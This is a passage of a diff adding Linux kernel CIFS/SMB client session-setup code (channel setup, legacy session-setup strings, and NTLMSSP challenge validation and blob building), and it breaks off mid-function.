++	char unc[sizeof(unc_fmt)+SERVER_NAME_LEN_WITH_NULL] = {0};
++	struct sockaddr_in *ipv4 = (struct sockaddr_in *)&iface->sockaddr;
++	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&iface->sockaddr;
++	int rc;
++	unsigned int xid = get_xid();
++
++	if (iface->sockaddr.ss_family == AF_INET)
++		cifs_dbg(FYI, "adding channel to ses %p (speed:%zu bps rdma:%s ip:%pI4)\n",
++			 ses, iface->speed, iface->rdma_capable ? "yes" : "no",
++			 &ipv4->sin_addr);
++	else
++		cifs_dbg(FYI, "adding channel to ses %p (speed:%zu bps rdma:%s ip:%pI6)\n",
++			 ses, iface->speed, iface->rdma_capable ? "yes" : "no",
++			 &ipv6->sin6_addr);
++
++	/*
++	 * Setup a ctx with mostly the same info as the existing
++	 * session and overwrite it with the requested iface data.
++	 *
++	 * We need to set up at least the fields used for negprot and
++	 * session setup.
++	 *
++	 * We only need the ctx here, so we can reuse memory from
++	 * the session and server without caring about memory
++	 * management.
++	 */
++
++	/* Always make new connection for now (TODO?) */
++	ctx.nosharesock = true;
++
++	/* Auth */
++	ctx.domainauto = ses->domainAuto;
++	ctx.domainname = ses->domainName;
++
++	/* no hostname for extra channels */
++	ctx.server_hostname = "";
++
++	ctx.username = ses->user_name;
++	ctx.password = ses->password;
++	ctx.sectype = ses->sectype;
++	ctx.sign = ses->sign;
++
++	/* UNC and paths */
++	/* XXX: Use ses->server->hostname? */
++	sprintf(unc, unc_fmt, ses->ip_addr);
++	ctx.UNC = unc;
++	ctx.prepath = "";
++
++	/* Reuse same version as master connection */
++	ctx.vals = ses->server->vals;
++	ctx.ops = ses->server->ops;
++
++	ctx.noblocksnd = ses->server->noblocksnd;
++	ctx.noautotune = ses->server->noautotune;
++	ctx.sockopt_tcp_nodelay = ses->server->tcp_nodelay;
++	ctx.echo_interval = ses->server->echo_interval / HZ;
++	ctx.max_credits = ses->server->max_credits;
++
++	/*
++	 * This will be used for encoding/decoding user/domain/pw
++	 * during sess setup auth.
++	 */
++	ctx.local_nls = cifs_sb->local_nls;
++
++	/* Use RDMA if possible */
++	ctx.rdma = iface->rdma_capable;
++	memcpy(&ctx.dstaddr, &iface->sockaddr, sizeof(struct sockaddr_storage));
++
++	/* reuse master con client guid */
++	memcpy(&ctx.client_guid, ses->server->client_guid,
++	       SMB2_CLIENT_GUID_SIZE);
++	ctx.use_client_guid = true;
++
++	chan_server = cifs_get_tcp_session(&ctx, ses->server);
++
++	spin_lock(&ses->chan_lock);
++	chan = &ses->chans[ses->chan_count];
++	chan->server = chan_server;
++	if (IS_ERR(chan->server)) {
++		rc = PTR_ERR(chan->server);
++		chan->server = NULL;
++		spin_unlock(&ses->chan_lock);
++		goto out;
++	}
++	chan->iface = iface;
++	ses->chan_count++;
++	atomic_set(&ses->chan_seq, 0);
++
++	/* Mark this channel as needing connect/setup */
++	cifs_chan_set_need_reconnect(ses, chan->server);
++
++	spin_unlock(&ses->chan_lock);
++
++	mutex_lock(&ses->session_mutex);
++	/*
++	 * We need to allocate the server crypto now as we will need
++	 * to sign packets before we generate the channel signing key
++	 * (we sign with the session key)
++	 */
++	rc = smb311_crypto_shash_allocate(chan->server);
++	if (rc) {
++		cifs_dbg(VFS, "%s: crypto alloc failed\n", __func__);
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++
++	rc = cifs_negotiate_protocol(xid, ses, chan->server);
++	if (!rc)
++		rc = cifs_setup_session(xid, ses, chan->server, cifs_sb->local_nls);
++
++	mutex_unlock(&ses->session_mutex);
++
++out:
++	if (rc && chan->server) {
++		/*
++		 * we should avoid racing with these delayed works before
++		 * we remove this channel
++		 */
++		cancel_delayed_work_sync(&chan->server->echo);
++		cancel_delayed_work_sync(&chan->server->resolve);
++		cancel_delayed_work_sync(&chan->server->reconnect);
++
++		spin_lock(&ses->chan_lock);
++		/* we rely on all bits beyond chan_count to be clear */
++		cifs_chan_clear_need_reconnect(ses, chan->server);
++		ses->chan_count--;
++		/*
++		 * chan_count should never reach 0 as at least the primary
++		 * channel is always allocated
++		 */
++		WARN_ON(ses->chan_count < 1);
++		spin_unlock(&ses->chan_lock);
++
++		cifs_put_tcp_session(chan->server, 0);
++	}
++
++	free_xid(xid);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static __u32 cifs_ssetup_hdr(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server,
++			     SESSION_SETUP_ANDX *pSMB)
++{
++	__u32 capabilities = 0;
++
++	/* init fields common to all four types of SessSetup */
++	/* Note that offsets for first seven fields in req struct are same  */
++	/*	in CIFS Specs so does not matter which of 3 forms of struct */
++	/*	that we use in next few lines                               */
++	/* Note that header is initialized to zero in header_assemble */
++	pSMB->req.AndXCommand = 0xFF;
++	pSMB->req.MaxBufferSize = cpu_to_le16(min_t(u32,
++					CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4,
++					USHRT_MAX));
++	pSMB->req.MaxMpxCount = cpu_to_le16(server->maxReq);
++	pSMB->req.VcNumber = cpu_to_le16(1);
++
++	/* Now no need to set SMBFLG_CASELESS or obsolete CANONICAL PATH */
++
++	/* BB verify whether signing required on neg or just on auth frame
++	   (and NTLM case) */
++
++	capabilities = CAP_LARGE_FILES | CAP_NT_SMBS | CAP_LEVEL_II_OPLOCKS |
++			CAP_LARGE_WRITE_X | CAP_LARGE_READ_X;
++
++	if (server->sign)
++		pSMB->req.hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	if (ses->capabilities & CAP_UNICODE) {
++		pSMB->req.hdr.Flags2 |= SMBFLG2_UNICODE;
++		capabilities |= CAP_UNICODE;
++	}
++	if (ses->capabilities & CAP_STATUS32) {
++		pSMB->req.hdr.Flags2 |= SMBFLG2_ERR_STATUS;
++		capabilities |= CAP_STATUS32;
++	}
++	if (ses->capabilities & CAP_DFS) {
++		pSMB->req.hdr.Flags2 |= SMBFLG2_DFS;
++		capabilities |= CAP_DFS;
++	}
++	if (ses->capabilities & CAP_UNIX)
++		capabilities |= CAP_UNIX;
++
++	return capabilities;
++}
++
++static void
++unicode_oslm_strings(char **pbcc_area, const struct nls_table *nls_cp)
++{
++	char *bcc_ptr = *pbcc_area;
++	int bytes_ret = 0;
++
++	/* Copy OS version */
++	bytes_ret = cifs_strtoUTF16((__le16 *)bcc_ptr, "Linux version ", 32,
++				    nls_cp);
++	bcc_ptr += 2 * bytes_ret;
++	bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, init_utsname()->release,
++				    32, nls_cp);
++	bcc_ptr += 2 * bytes_ret;
++	bcc_ptr += 2; /* trailing null */
++
++	bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, CIFS_NETWORK_OPSYS,
++				    32, nls_cp);
++	bcc_ptr += 2 * bytes_ret;
++	bcc_ptr += 2; /* trailing null */
++
++	*pbcc_area = bcc_ptr;
++}
++
++static void unicode_domain_string(char **pbcc_area, struct cifs_ses *ses,
++				   const struct nls_table *nls_cp)
++{
++	char *bcc_ptr = *pbcc_area;
++	int bytes_ret = 0;
++
++	/* copy domain */
++	if (ses->domainName == NULL) {
++		/* Sending a null domain is better than using a bogus domain
++		name (as we did briefly in 2.6.18) since the server will use
++		its default */
++		*bcc_ptr = 0;
++		*(bcc_ptr+1) = 0;
++		bytes_ret = 0;
++	} else {
++		bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, ses->domainName,
++					    CIFS_MAX_DOMAINNAME_LEN, nls_cp);
++	}
++	bcc_ptr += 2 * bytes_ret;
++	bcc_ptr += 2;  /* account for null terminator */
++
++	*pbcc_area = bcc_ptr;
++}
++
++static void unicode_ssetup_strings(char **pbcc_area, struct cifs_ses *ses,
++				   const struct nls_table *nls_cp)
++{
++	char *bcc_ptr = *pbcc_area;
++	int bytes_ret = 0;
++
++	/* BB FIXME add a check that the strings total less than
++	335, or we will need to send them as arrays */
++
++	/* copy user */
++	if (ses->user_name == NULL) {
++		/* null user mount */
++		*bcc_ptr = 0;
++		*(bcc_ptr+1) = 0;
++	} else {
++		bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, ses->user_name,
++					    CIFS_MAX_USERNAME_LEN, nls_cp);
++	}
++	bcc_ptr += 2 * bytes_ret;
++	bcc_ptr += 2; /* account for null termination */
++
++	unicode_domain_string(&bcc_ptr, ses, nls_cp);
++	unicode_oslm_strings(&bcc_ptr, nls_cp);
++
++	*pbcc_area = bcc_ptr;
++}
++
++static void ascii_ssetup_strings(char **pbcc_area, struct cifs_ses *ses,
++				 const struct nls_table *nls_cp)
++{
++	char *bcc_ptr = *pbcc_area;
++	int len;
++
++	/* copy user */
++	/* BB what about null user mounts - check that we do this BB */
++	if (ses->user_name != NULL) {
++		len = strscpy(bcc_ptr, ses->user_name, CIFS_MAX_USERNAME_LEN);
++		if (WARN_ON_ONCE(len < 0))
++			len = CIFS_MAX_USERNAME_LEN - 1;
++		bcc_ptr += len;
++	}
++	/* else null user mount */
++	*bcc_ptr = 0;
++	bcc_ptr++; /* account for null termination */
++
++	/* copy domain */
++	if (ses->domainName != NULL) {
++		len = strscpy(bcc_ptr, ses->domainName, CIFS_MAX_DOMAINNAME_LEN);
++		if (WARN_ON_ONCE(len < 0))
++			len = CIFS_MAX_DOMAINNAME_LEN - 1;
++		bcc_ptr += len;
++	} /* else we will send a null domain name
++	     so the server will default to its own domain */
++	*bcc_ptr = 0;
++	bcc_ptr++;
++
++	/* BB check for overflow here */
++
++	strcpy(bcc_ptr, "Linux version ");
++	bcc_ptr += strlen("Linux version ");
++	strcpy(bcc_ptr, init_utsname()->release);
++	bcc_ptr += strlen(init_utsname()->release) + 1;
++
++	strcpy(bcc_ptr, CIFS_NETWORK_OPSYS);
++	bcc_ptr += strlen(CIFS_NETWORK_OPSYS) + 1;
++
++	*pbcc_area = bcc_ptr;
++}
++
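++/*
++ * Parse the UTF-16 serverOS, serverNOS and serverDomain strings from
++ * the tail of the session setup response, stopping early if the
++ * remaining byte count runs out.
++ */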
++static void
++decode_unicode_ssetup(char **pbcc_area, int bleft, struct cifs_ses *ses,
++		      const struct nls_table *nls_cp)
++{
++	int len;
++	char *data = *pbcc_area;
++
++	cifs_dbg(FYI, "bleft %d\n", bleft);
++
++	kfree(ses->serverOS);
++	ses->serverOS = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
++	cifs_dbg(FYI, "serverOS=%s\n", ses->serverOS);
++	len = (UniStrnlen((wchar_t *) data, bleft / 2) * 2) + 2;
++	data += len;
++	bleft -= len;
++	if (bleft <= 0)
++		return;
++
++	kfree(ses->serverNOS);
++	ses->serverNOS = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
++	cifs_dbg(FYI, "serverNOS=%s\n", ses->serverNOS);
++	len = (UniStrnlen((wchar_t *) data, bleft / 2) * 2) + 2;
++	data += len;
++	bleft -= len;
++	if (bleft <= 0)
++		return;
++
++	kfree(ses->serverDomain);
++	ses->serverDomain = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
++	cifs_dbg(FYI, "serverDomain=%s\n", ses->serverDomain);
++
++	return;
++}
++
++static void decode_ascii_ssetup(char **pbcc_area, __u16 bleft,
++				struct cifs_ses *ses,
++				const struct nls_table *nls_cp)
++{
++	int len;
++	char *bcc_ptr = *pbcc_area;
++
++	cifs_dbg(FYI, "decode sessetup ascii. bleft %d\n", bleft);
++
++	len = strnlen(bcc_ptr, bleft);
++	if (len >= bleft)
++		return;
++
++	kfree(ses->serverOS);
++
++	ses->serverOS = kmalloc(len + 1, GFP_KERNEL);
++	if (ses->serverOS) {
++		memcpy(ses->serverOS, bcc_ptr, len);
++		ses->serverOS[len] = 0;
++		if (strncmp(ses->serverOS, "OS/2", 4) == 0)
++			cifs_dbg(FYI, "OS/2 server\n");
++	}
++
++	bcc_ptr += len + 1;
++	bleft -= len + 1;
++
++	len = strnlen(bcc_ptr, bleft);
++	if (len >= bleft)
++		return;
++
++	kfree(ses->serverNOS);
++
++	ses->serverNOS = kmalloc(len + 1, GFP_KERNEL);
++	if (ses->serverNOS) {
++		memcpy(ses->serverNOS, bcc_ptr, len);
++		ses->serverNOS[len] = 0;
++	}
++
++	bcc_ptr += len + 1;
++	bleft -= len + 1;
++
++	len = strnlen(bcc_ptr, bleft);
++	if (len > bleft)
++		return;
++
++	/* No domain field in LANMAN case. Domain is
++	   returned by old servers in the SMB negprot response */
++	/* BB For newer servers which do not support Unicode,
++	   but do return the domain here, we could add parsing
++	   for it later, but it is not very important */
++	cifs_dbg(FYI, "ascii: bytes left %d\n", bleft);
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
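++/*
++ * Validate the NTLMSSP CHALLENGE message from the server: check the
++ * signature and message type, sanity-check the negotiate flags against
++ * what we requested, then stash the server challenge and target info
++ * for use when computing the NTLMv2 response.
++ */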
++int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len,
++				    struct cifs_ses *ses)
++{
++	unsigned int tioffset; /* challenge message target info area */
++	unsigned int tilen; /* challenge message target info area length  */
++	CHALLENGE_MESSAGE *pblob = (CHALLENGE_MESSAGE *)bcc_ptr;
++	__u32 server_flags;
++
++	if (blob_len < sizeof(CHALLENGE_MESSAGE)) {
++		cifs_dbg(VFS, "challenge blob len %d too small\n", blob_len);
++		return -EINVAL;
++	}
++
++	if (memcmp(pblob->Signature, "NTLMSSP", 8)) {
++		cifs_dbg(VFS, "blob signature incorrect %s\n",
++			 pblob->Signature);
++		return -EINVAL;
++	}
++	if (pblob->MessageType != NtLmChallenge) {
++		cifs_dbg(VFS, "Incorrect message type %d\n",
++			 pblob->MessageType);
++		return -EINVAL;
++	}
++
++	server_flags = le32_to_cpu(pblob->NegotiateFlags);
++	cifs_dbg(FYI, "%s: negotiate=0x%08x challenge=0x%08x\n", __func__,
++		 ses->ntlmssp->client_flags, server_flags);
++
++	if ((ses->ntlmssp->client_flags & (NTLMSSP_NEGOTIATE_SEAL | NTLMSSP_NEGOTIATE_SIGN)) &&
++	    (!(server_flags & NTLMSSP_NEGOTIATE_56) && !(server_flags & NTLMSSP_NEGOTIATE_128))) {
++		cifs_dbg(VFS, "%s: requested signing/encryption but server did not return either 56-bit or 128-bit session key size\n",
++			 __func__);
++		return -EINVAL;
++	}
++	if (!(server_flags & NTLMSSP_NEGOTIATE_NTLM) && !(server_flags & NTLMSSP_NEGOTIATE_EXTENDED_SEC)) {
++		cifs_dbg(VFS, "%s: server does not seem to support either NTLMv1 or NTLMv2\n", __func__);
++		return -EINVAL;
++	}
++	if (ses->server->sign && !(server_flags & NTLMSSP_NEGOTIATE_SIGN)) {
++		cifs_dbg(VFS, "%s: forced packet signing but server does not seem to support it\n",
++			 __func__);
++		return -EOPNOTSUPP;
++	}
++	if ((ses->ntlmssp->client_flags & NTLMSSP_NEGOTIATE_KEY_XCH) &&
++	    !(server_flags & NTLMSSP_NEGOTIATE_KEY_XCH))
++		pr_warn_once("%s: authentication has been weakened as server does not support key exchange\n",
++			     __func__);
++
++	ses->ntlmssp->server_flags = server_flags;
++
++	memcpy(ses->ntlmssp->cryptkey, pblob->Challenge, CIFS_CRYPTO_KEY_SIZE);
++	/* In particular we can examine sign flags */
++	/* BB spec says that if AvId field of MsvAvTimestamp is populated then
++		we must set the MIC field of the AUTHENTICATE_MESSAGE */
++
++	tioffset = le32_to_cpu(pblob->TargetInfoArray.BufferOffset);
++	tilen = le16_to_cpu(pblob->TargetInfoArray.Length);
++	if (tioffset > blob_len || tioffset + tilen > blob_len) {
++		cifs_dbg(VFS, "tioffset + tilen too high %u + %u\n",
++			 tioffset, tilen);
++		return -EINVAL;
++	}
++	if (tilen) {
++		kfree_sensitive(ses->auth_key.response);
++		ses->auth_key.response = kmemdup(bcc_ptr + tioffset, tilen,
++						 GFP_KERNEL);
++		if (!ses->auth_key.response) {
++			cifs_dbg(VFS, "Challenge target info alloc failure\n");
++			return -ENOMEM;
++		}
++		ses->auth_key.len = tilen;
++	}
++
++	return 0;
++}
++
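++/*
++ * Worst-case size of an NTLMSSP message: the fixed part plus room for
++ * the NTLMv2 response and encrypted session key, plus the UTF-16
++ * encodings of the domain, user and workstation names (an empty __le16
++ * slot is reserved for each name that is absent).
++ */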
++static int size_of_ntlmssp_blob(struct cifs_ses *ses, int base_size)
++{
++	int sz = base_size + ses->auth_key.len
++		- CIFS_SESS_KEY_SIZE + CIFS_CPHTXT_SIZE + 2;
++
++	if (ses->domainName)
++		sz += sizeof(__le16) * strnlen(ses->domainName, CIFS_MAX_DOMAINNAME_LEN);
++	else
++		sz += sizeof(__le16);
++
++	if (ses->user_name)
++		sz += sizeof(__le16) * strnlen(ses->user_name, CIFS_MAX_USERNAME_LEN);
++	else
++		sz += sizeof(__le16);
++
++	if (ses->workstation_name[0])
++		sz += sizeof(__le16) * strnlen(ses->workstation_name,
++					       ntlmssp_workstation_name_size(ses));
++	else
++		sz += sizeof(__le16);
++
++	return sz;
++}
++
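++/*
++ * Fill in a SECURITY_BUFFER header and append the UTF-16 encoding of
++ * @str_value at *pcur. Offsets are relative to @pstart (the start of
++ * the message) and *pcur is advanced past the data written; an absent
++ * string still reserves an empty __le16 slot.
++ */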
++static inline void cifs_security_buffer_from_str(SECURITY_BUFFER *pbuf,
++						 char *str_value,
++						 int str_length,
++						 unsigned char *pstart,
++						 unsigned char **pcur,
++						 const struct nls_table *nls_cp)
++{
++	unsigned char *tmp = pstart;
++	int len;
++
++	if (!pbuf)
++		return;
++
++	if (!pcur)
++		pcur = &tmp;
++
++	if (!str_value) {
++		pbuf->BufferOffset = cpu_to_le32(*pcur - pstart);
++		pbuf->Length = 0;
++		pbuf->MaximumLength = 0;
++		*pcur += sizeof(__le16);
++	} else {
++		len = cifs_strtoUTF16((__le16 *)*pcur,
++				      str_value,
++				      str_length,
++				      nls_cp);
++		len *= sizeof(__le16);
++		pbuf->BufferOffset = cpu_to_le32(*pcur - pstart);
++		pbuf->Length = cpu_to_le16(len);
++		pbuf->MaximumLength = cpu_to_le16(len);
++		*pcur += len;
++	}
++}
++
++/* BB Move to ntlmssp.c eventually */
++
++int build_ntlmssp_negotiate_blob(unsigned char **pbuffer,
++				 u16 *buflen,
++				 struct cifs_ses *ses,
++				 struct TCP_Server_Info *server,
++				 const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	NEGOTIATE_MESSAGE *sec_blob;
++	__u32 flags;
++	unsigned char *tmp;
++	int len;
++
++	len = size_of_ntlmssp_blob(ses, sizeof(NEGOTIATE_MESSAGE));
++	*pbuffer = kmalloc(len, GFP_KERNEL);
++	if (!*pbuffer) {
++		rc = -ENOMEM;
++		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
++		*buflen = 0;
++		goto setup_ntlm_neg_ret;
++	}
++	sec_blob = (NEGOTIATE_MESSAGE *)*pbuffer;
++
++	memset(*pbuffer, 0, sizeof(NEGOTIATE_MESSAGE));
++	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
++	sec_blob->MessageType = NtLmNegotiate;
++
++	/* BB is NTLMV2 session security format easier to use here? */
++	flags = NTLMSSP_NEGOTIATE_56 |	NTLMSSP_REQUEST_TARGET |
++		NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_UNICODE |
++		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SEC |
++		NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_SEAL |
++		NTLMSSP_NEGOTIATE_SIGN;
++	if (!server->session_estab || ses->ntlmssp->sesskey_per_smbsess)
++		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
++
++	tmp = *pbuffer + sizeof(NEGOTIATE_MESSAGE);
++	ses->ntlmssp->client_flags = flags;
++	sec_blob->NegotiateFlags = cpu_to_le32(flags);
++
++	/* these fields should be null in the negotiate phase; see MS-NLMP 3.1.5.1.1 */
++	cifs_security_buffer_from_str(&sec_blob->DomainName,
++				      NULL,
++				      CIFS_MAX_DOMAINNAME_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
++				      NULL,
++				      CIFS_MAX_WORKSTATION_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	*buflen = tmp - *pbuffer;
++setup_ntlm_neg_ret:
++	return rc;
++}
++
++/*
++ * Build ntlmssp blob with additional fields, such as version,
++ * supported by modern servers. For safety, limit this to SMB3 or later.
++ * See e.g. the notes in MS-NLMP Section 2.2.2.1.
++ */
++int build_ntlmssp_smb3_negotiate_blob(unsigned char **pbuffer,
++				 u16 *buflen,
++				 struct cifs_ses *ses,
++				 struct TCP_Server_Info *server,
++				 const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	struct negotiate_message *sec_blob;
++	__u32 flags;
++	unsigned char *tmp;
++	int len;
++
++	len = size_of_ntlmssp_blob(ses, sizeof(struct negotiate_message));
++	*pbuffer = kmalloc(len, GFP_KERNEL);
++	if (!*pbuffer) {
++		rc = -ENOMEM;
++		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
++		*buflen = 0;
++		goto setup_ntlm_smb3_neg_ret;
++	}
++	sec_blob = (struct negotiate_message *)*pbuffer;
++
++	memset(*pbuffer, 0, sizeof(struct negotiate_message));
++	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
++	sec_blob->MessageType = NtLmNegotiate;
++
++	/* BB is NTLMV2 session security format easier to use here? */
++	flags = NTLMSSP_NEGOTIATE_56 |	NTLMSSP_REQUEST_TARGET |
++		NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_UNICODE |
++		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SEC |
++		NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_SEAL |
++		NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_VERSION;
++	if (!server->session_estab || ses->ntlmssp->sesskey_per_smbsess)
++		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
++
++	sec_blob->Version.ProductMajorVersion = LINUX_VERSION_MAJOR;
++	sec_blob->Version.ProductMinorVersion = LINUX_VERSION_PATCHLEVEL;
++	sec_blob->Version.ProductBuild = cpu_to_le16(SMB3_PRODUCT_BUILD);
++	sec_blob->Version.NTLMRevisionCurrent = NTLMSSP_REVISION_W2K3;
++
++	tmp = *pbuffer + sizeof(struct negotiate_message);
++	ses->ntlmssp->client_flags = flags;
++	sec_blob->NegotiateFlags = cpu_to_le32(flags);
++
++	/* these fields should be null in the negotiate phase; see MS-NLMP 3.1.5.1.1 */
++	cifs_security_buffer_from_str(&sec_blob->DomainName,
++				      NULL,
++				      CIFS_MAX_DOMAINNAME_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
++				      NULL,
++				      CIFS_MAX_WORKSTATION_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	*buflen = tmp - *pbuffer;
++setup_ntlm_smb3_neg_ret:
++	return rc;
++}
++
++int build_ntlmssp_auth_blob(unsigned char **pbuffer,
++					u16 *buflen,
++				   struct cifs_ses *ses,
++				   struct TCP_Server_Info *server,
++				   const struct nls_table *nls_cp)
++{
++	int rc;
++	AUTHENTICATE_MESSAGE *sec_blob;
++	__u32 flags;
++	unsigned char *tmp;
++	int len;
++
++	rc = setup_ntlmv2_rsp(ses, nls_cp);
++	if (rc) {
++		cifs_dbg(VFS, "Error %d during NTLMSSP authentication\n", rc);
++		*buflen = 0;
++		goto setup_ntlmv2_ret;
++	}
++
++	len = size_of_ntlmssp_blob(ses, sizeof(AUTHENTICATE_MESSAGE));
++	*pbuffer = kmalloc(len, GFP_KERNEL);
++	if (!*pbuffer) {
++		rc = -ENOMEM;
++		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
++		*buflen = 0;
++		goto setup_ntlmv2_ret;
++	}
++	sec_blob = (AUTHENTICATE_MESSAGE *)*pbuffer;
++
++	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
++	sec_blob->MessageType = NtLmAuthenticate;
++
++	flags = ses->ntlmssp->server_flags | NTLMSSP_REQUEST_TARGET |
++		NTLMSSP_NEGOTIATE_TARGET_INFO | NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED;
++
++	tmp = *pbuffer + sizeof(AUTHENTICATE_MESSAGE);
++	sec_blob->NegotiateFlags = cpu_to_le32(flags);
++
++	sec_blob->LmChallengeResponse.BufferOffset =
++				cpu_to_le32(sizeof(AUTHENTICATE_MESSAGE));
++	sec_blob->LmChallengeResponse.Length = 0;
++	sec_blob->LmChallengeResponse.MaximumLength = 0;
++
++	sec_blob->NtChallengeResponse.BufferOffset =
++				cpu_to_le32(tmp - *pbuffer);
++	if (ses->user_name != NULL) {
++		memcpy(tmp, ses->auth_key.response + CIFS_SESS_KEY_SIZE,
++				ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++		tmp += ses->auth_key.len - CIFS_SESS_KEY_SIZE;
++
++		sec_blob->NtChallengeResponse.Length =
++				cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++		sec_blob->NtChallengeResponse.MaximumLength =
++				cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++	} else {
++		/*
++		 * don't send an NT Response for anonymous access
++		 */
++		sec_blob->NtChallengeResponse.Length = 0;
++		sec_blob->NtChallengeResponse.MaximumLength = 0;
++	}
++
++	cifs_security_buffer_from_str(&sec_blob->DomainName,
++				      ses->domainName,
++				      CIFS_MAX_DOMAINNAME_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	cifs_security_buffer_from_str(&sec_blob->UserName,
++				      ses->user_name,
++				      CIFS_MAX_USERNAME_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
++				      ses->workstation_name,
++				      ntlmssp_workstation_name_size(ses),
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	if ((ses->ntlmssp->server_flags & NTLMSSP_NEGOTIATE_KEY_XCH) &&
++	    (!ses->server->session_estab || ses->ntlmssp->sesskey_per_smbsess) &&
++	    !calc_seckey(ses)) {
++		memcpy(tmp, ses->ntlmssp->ciphertext, CIFS_CPHTXT_SIZE);
++		sec_blob->SessionKey.BufferOffset = cpu_to_le32(tmp - *pbuffer);
++		sec_blob->SessionKey.Length = cpu_to_le16(CIFS_CPHTXT_SIZE);
++		sec_blob->SessionKey.MaximumLength =
++				cpu_to_le16(CIFS_CPHTXT_SIZE);
++		tmp += CIFS_CPHTXT_SIZE;
++	} else {
++		sec_blob->SessionKey.BufferOffset = cpu_to_le32(tmp - *pbuffer);
++		sec_blob->SessionKey.Length = 0;
++		sec_blob->SessionKey.MaximumLength = 0;
++	}
++
++	*buflen = tmp - *pbuffer;
++setup_ntlmv2_ret:
++	return rc;
++}
++
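++/*
++ * Pick the authentication mechanism for this connection: honour an
++ * explicit request when the negotiated security flavor supports it,
++ * otherwise choose among the types permitted by global_secflags.
++ */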
++enum securityEnum
++cifs_select_sectype(struct TCP_Server_Info *server, enum securityEnum requested)
++{
++	switch (server->negflavor) {
++	case CIFS_NEGFLAVOR_EXTENDED:
++		switch (requested) {
++		case Kerberos:
++		case RawNTLMSSP:
++			return requested;
++		case Unspecified:
++			if (server->sec_ntlmssp &&
++			    (global_secflags & CIFSSEC_MAY_NTLMSSP))
++				return RawNTLMSSP;
++			if ((server->sec_kerberos || server->sec_mskerberos) &&
++			    (global_secflags & CIFSSEC_MAY_KRB5))
++				return Kerberos;
++			fallthrough;
++		default:
++			return Unspecified;
++		}
++	case CIFS_NEGFLAVOR_UNENCAP:
++		switch (requested) {
++		case NTLMv2:
++			return requested;
++		case Unspecified:
++			if (global_secflags & CIFSSEC_MAY_NTLMV2)
++				return NTLMv2;
++			break;
++		default:
++			break;
++		}
++		fallthrough;
++	default:
++		return Unspecified;
++	}
++}
++
++struct sess_data {
++	unsigned int xid;
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct nls_table *nls_cp;
++	void (*func)(struct sess_data *);
++	int result;
++
++	/* we will send the SMB in three pieces:
++	 * a fixed length beginning part, an optional
++	 * SPNEGO blob (which can be zero length), and a
++	 * last part which will include the strings
++	 * and the rest of the bcc area. This allows us to avoid
++	 * a large 17K buffer allocation
++	 */
++	int buf0_type;
++	struct kvec iov[3];
++};
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
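++/*
++ * Allocate the request buffer (iov[0]) for a SESSION_SETUP_ANDX with
++ * the given word count, plus a 2000 byte scratch area (iov[2]) for the
++ * trailing user/domain/OS strings.
++ */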
++static int
++sess_alloc_buffer(struct sess_data *sess_data, int wct)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct smb_hdr *smb_buf;
++
++	rc = small_smb_init_no_tc(SMB_COM_SESSION_SETUP_ANDX, wct, ses,
++				  (void **)&smb_buf);
++
++	if (rc)
++		return rc;
++
++	sess_data->iov[0].iov_base = (char *)smb_buf;
++	sess_data->iov[0].iov_len = be32_to_cpu(smb_buf->smb_buf_length) + 4;
++	/*
++	 * This variable will be used to clear the buffer
++	 * allocated above in case of any error in the calling function.
++	 */
++	sess_data->buf0_type = CIFS_SMALL_BUFFER;
++
++	/* 2000 big enough to fit max user, domain, NOS name etc. */
++	sess_data->iov[2].iov_base = kmalloc(2000, GFP_KERNEL);
++	if (!sess_data->iov[2].iov_base) {
++		rc = -ENOMEM;
++		goto out_free_smb_buf;
++	}
++
